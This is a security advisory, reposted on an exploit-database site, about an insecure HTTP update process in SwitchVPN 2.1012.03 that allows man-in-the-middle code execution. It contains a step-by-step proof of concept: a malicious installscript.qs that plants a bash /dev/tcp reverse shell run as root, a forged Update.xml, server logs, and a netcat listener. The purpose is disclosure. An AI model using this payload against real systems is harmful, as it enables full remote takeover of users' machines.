0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle Vulnerability
======================================================================= Title: Insecure Update Process and RCE Product: SwitchVPN for MacOS, Windows Vulnerable version: 2.1012.03 CVE ID: Requested Impact: Critical Homepage: https://switchvpn.net/ By: Bernd Leitner (bernd.leitner [at] gmail dot com) ======================================================================= Vendor description: ------------------- "By 2015 we were frustrated that the free internet we loved was under threat. As experts in online security we believed we could solve this problem. So we came together as a team to make SwitchVPN, a simple and powerful app to keep the internet free. SwitchVPN is simple. Install it on your phone, tablet or laptop, then just switch it on to keep the internet free. SwitchVPN is powerful. Our exclusive VPN Service technology is constantly being upgraded by a dedicated team of internet security experts." Source: https://switchvpn.net/ Business recommendation: ------------------------ By exploiting the vulnerability documented in this advisory, an attacker can leverage the update process to install malware or execute arbitrary code and fully compromise the system. Users are urged to disable auto-updates and do not run the manual update utility until the issue has been fixed. Vulnerability overview/description: ----------------------------------- Insecure Update Process The update process in the SwitchVPN client is vulnerable to a MiTM (man-in-the-middle) attack. The client either checks for the availability of a new version using the integrated auto-update function, or the user can manually initiate an update using an update utility. Version information is pulled from a remote XML file and compared to the version number of the currently installed SwitchVPN client. All requests are transmitted over HTTP, which means that an attacker on the same network is able to intercept and manipulate the traffic. This means, an attacker can trigger the SwitchVPN client to download a malicious update package which will be installed on the device. In addition to that, an attacker is able to implant an installation script (installscript.qs) which will get executed immediately with elevated privileges. When auto-update is enabled (which is the default setting), this process happens completely transparent to the user. Proof of concept ----------------- In order to demonstrate the issue, a PoC for spawning a remote shell on MacOS is presented. A demonstration video can be (temporarily) downloaded from: https://www.dropbox.com/s/zwczouzh922z2un/poc_switchvpn_update.mov NOTE: Delivering a malicious payload through the main update package can be set up the same way: 1) Prepare malicious installscript.qs: ============================================================================================ ... Component.prototype.createOperations = function() { component.createOperations(); installer.execute("touch", "/tmp/pwn.sh"); installer.execute("/bin/sh", new Array("-c", 'echo "bash -i >& /dev/tcp/ 192.168.1.2/9999 0>&1" >> /tmp/pwn.sh')); installer.execute("/bin/sh", new Array("-c", "chmod 755 /tmp/pwn.sh")); component.addElevatedOperation("Execute", "/tmp/pwn.sh"); installer.installationFinished.connect(this, Component.prototype.installationFinishedPageIsShown); } Component.prototype.installationFinishedPageIsShown = function() { console.log("Component.prototype.installationFinishedPageIsShown\n\n"); } ... ============================================================================================ 2) Store "installscript.qs" in folder "com.svpn.osx" and compress to "2.6666.03meta.7z": ============================================================================================ mb:~ b$ shasum 2.6666.03meta.7z 20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f 2.6666.03meta.7z ============================================================================================ 3) Prepare "Update.xml" which will be delivered to SwitchVPN client: ============================================================================================ <Updates> <ApplicationName>{AnyApplication}</ApplicationName> <ApplicationVersion>1.0.0</ApplicationVersion> <Checksum>true</Checksum> <PackageUpdate> <Name>com.svpn.osx</Name> <DisplayName>Switch VPN</DisplayName> <Description>Switch VPN</Description> <Script>installscript.qs</Script> <Version>2.6666.03</Version> // <----- New (high) version number to trigger update <ReleaseDate>2017-10-12</ReleaseDate> <Default>true</Default> <ForcedInstallation>true</ForcedInstallation> <RequiresAdminRights>true</RequiresAdminRights> <UpdateFile CompressedSize="12805545" OS="Any" UncompressedSize="33330707"/> <DownloadableArchives>SwitchVPN.app.7z</DownloadableArchives> <SHA1>20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f</SHA1> // <----- SHA-1 hash of 2.6666.03meta.7z </PackageUpdate> </Updates> ============================================================================================ 4) Perform MiTM attack (e.g. using arpspoof, bettercap, etc...) ============================================================================================ NOTE: Setting up a MiTM environment won't be discussed in this advisory. Create the following folder structure for the malicious web-server: /updates/osx/repo/com.svpn.osx Store Update.xml to: /updates/osx/repo/Update.xml Store malicious update data to: /updates/osx/repo/com.svpn.osx/ -rw-r--r--@ 1 b staff 12805505 Nov 1 14:37 2.6666.03SwitchVPN.app.7z -rw-r--r--@ 1 b staff 40 Nov 1 14:37 2.6666.03SwitchVPN.app.7z.sha1 -rw-r--r--@ 1 b staff 526 Nov 1 20:36 2.6666.03meta.7z <----- contains malicious "installscript.qs" ============================================================================================ 5) Start SwitchVPN client or run the manual update utility: ============================================================================================ # Requests are successfully redirected to our web-server Serving HTTP on 0.0.0.0 port 80 ... 127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 - 127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 - 127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 - 127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 - 127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200 - 127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 - ... ============================================================================================ 6) Receive reverse shell: ============================================================================================ # Start netcat listener before starting SwitchVPN client mb:~ b$ nc -l 9999 bash: no job control in this shell bash-3.2# whoami root ============================================================================================ Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: 2.1012.03. Earlier versions might be vulnerable as well. Both, the Windows and MacOS versions are vulnerable. Vendor contact timeline: ------------------------ 2018-11-01: Contacted vendor through management@switchvpn.net 2018-11-02: Sent advisory and link to PoC video to management@switchvpn.net 2018-11-11: Requested update from vendor 2018-11-12: Informed vendor about advisory release Solution: --------- None. Workaround: ----------- None. EOF B. Leitner / @2018 # 0day.today [2024-11-14] #